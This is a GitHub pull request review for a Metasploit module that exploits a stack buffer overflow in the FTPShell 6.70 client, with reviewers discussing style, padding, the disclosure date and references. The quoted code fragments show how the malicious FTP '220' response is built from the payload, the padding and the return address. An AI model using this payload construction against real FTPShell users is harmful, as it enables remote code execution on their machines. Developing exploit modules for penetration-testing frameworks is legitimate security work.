FTPShell client 6.70 (Enterprise edition) Stack Buffer Overflow #10213
Conversation
LGTM. Minor comments.
sploit = "220 \""
sploit << payload.encoded
sploit << "\x20"*(400-payload.encoded.length)
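Review bot: the padding expression "\x20"*(400-payload.encoded.length) assumes the encoded payload never exceeds 400 bytes; if it does, the count goes negative and Ruby's String#* raises ArgumentError, which aborts the handler with an unhelpful backtrace instead of a clear module error. Unless the target's Payload Space is also set to 400 (not visible in this hunk) so the framework rejects oversized payloads before this point, derive both values from the same constant and fail with an explicit message when the payload is too large.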
I believe you can use payload_space from Msf::Module::Target here, rather than hardcoding 400.
Also, some white space between operators makes this a little easier to read.
sploit << "\x20" * (payload_space - payload.encoded.length)
register_options(
[
OptPort.new('SRVPORT', [ true, "The FTP port to listen on", 21 ])
Single quotes are preferred when string interpolation isn't required.
Also, my personal preference is to format register_options as follows when there's only one option with a short description.
register_options [ OptPort.new('SRVPORT', [ true, 'The FTP port to listen on', 21 ]) ]
or:
register_options [
OptPort.new('SRVPORT', [ true, 'The FTP port to listen on', 21 ])
]
Fixed the register_options.
'Author' =>
[
'r4wd3r', # Original exploit author
'Daniel Teixeira <danieljcrteixeira[at]gmail.com>' # MSF module author
It looks like you're mentioned in about a dozen modules, and usually without an associated email address.
If you like, we can add your name to the .mailmap file. That way your email will be auto-populated in the documentation and when viewing the module info within msfconsole. Up to you.
# grep -rni 'Daniel Teixeira' modules/
modules/exploits/multi/http/oscommerce_installer_unauth_code_exec.rb:22: 'Daniel Teixeira' # MSF module author
modules/exploits/windows/browser/exodus.rb:27: 'Daniel Teixeira' # MSF module author
modules/exploits/windows/ftp/ayukov_nftp.rb:23: 'Daniel Teixeira', # MSF module author
modules/exploits/windows/ftp/labf_nfsaxe.rb:23: 'Daniel Teixeira' # MSF module author
modules/exploits/windows/http/dupscts_bof.rb:27: 'Daniel Teixeira' # Metasploit module
modules/exploits/windows/http/vxsrchs_bof.rb:26: 'Daniel Teixeira'
modules/exploits/windows/http/syncbreeze_bof.rb:26: 'Daniel Teixeira',
modules/exploits/windows/http/disksorter_bof.rb:26: 'Daniel Teixeira'
modules/exploits/windows/fileformat/syncbreeze_xml.rb:22: 'Daniel Teixeira'
modules/exploits/windows/fileformat/dupscout_xml.rb:22: 'Daniel Teixeira'
modules/exploits/windows/misc/cloudme_sync.rb:24: 'Daniel Teixeira' # MSF module author
modules/exploits/windows/misc/disk_savvy_adm.rb:24: 'Daniel Teixeira'
modules/auxiliary/dos/http/slowloris.py:24: 'Daniel Teixeira', # Metasploit module (Ruby)
Thank you, I would appreciate that if you could.
Thank you
super(update_info(info,
'Name' => 'FTPShell client 6.70 (Enterprise edition) Stack Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow in the FTPShell client 6.70 (Enterprise edition) allowing remote
Line wrap at ~80 columns is preferred, but not required. In this instance it would make sense, as the following line contains only two words.
Done, thanks.
res = client.get_once.to_s.strip
print_status("#{client.peerhost} - Request: #{res}")

sploit = "220 \""
No need to use double quotes and escaping here.
sploit = '220 "'
Done.
'SRVHOST' => '0.0.0.0',
'EXITFUNC' => 'thread'
},
'DisclosureDate' => 'May 15 2017',
Is this 2017 disclosure date accurate? The CVE listed in References is from 2018.
A quick grep reveals this might be a result of forgotten copypasta from another FTP module:
# grep -rn "'May 15 2017'" modules/exploits/
modules/exploits/windows/ftp/labf_nfsaxe.rb:45: 'DisclosureDate' => 'May 15 2017',
[...]
However, it appears there was a previous similar bug reported in FTPShell with CVE (2017-6465) dated March 9th 2017, with an exploit published on EDB on March 4th 2017.
If these are applicable, please add refs:
- BID: 96570
- EDB: 41511
- CVE: 2017-6465
I'm sorry, I've fixed the disclosure date to March 4 2017.
sploit << payload.encoded
sploit << '\x20' * (payload_space - payload.encoded.length)
sploit << target.ret
sploit << '" is current directory\r\n'
It looks like you were a little overzealous in replacing " with '. Double quotes are needed for escaping, such as hex and CRLF.
sploit = '220 "'
sploit << payload.encoded
sploit << "\x20" * (payload_space - payload.encoded.length)
sploit << target.ret
sploit << "\" is current directory\r\n"
end

def on_client_connect(client)
return if ((p = regenerate_payload(client)) == nil)
.nil? is preferred
I think the If you fix the issues outlined above (double quotes, mixin,
I ran into a couple of issues. Seems the exploit is not 100% reliable, which is ok for
All done, hopefully this will address all the issues. Thank you for all the help.
LGTM
Release Notes
The exploit/windows/ftp/ftpshell_cli_bof module has been added to the framework. It exploits a stack-based buffer overflow vulnerability in FTPShell client 6.70 (Enterprise edition) on Windows systems.
Nice job @DanielRTeixeira. Thanks for the credit on this one ;)
Hello, the success rate of this vulnerability is not 100%, is there any solution?
This PR adds a module to exploit a remote buffer overflow in the FTPShell client 6.70.
Tested on: Windows 7 Enterprise SP1 x64
Verification
List the steps needed to make sure this thing works
msfconsole
use exploit/windows/ftp/labf_nfsaxe
Example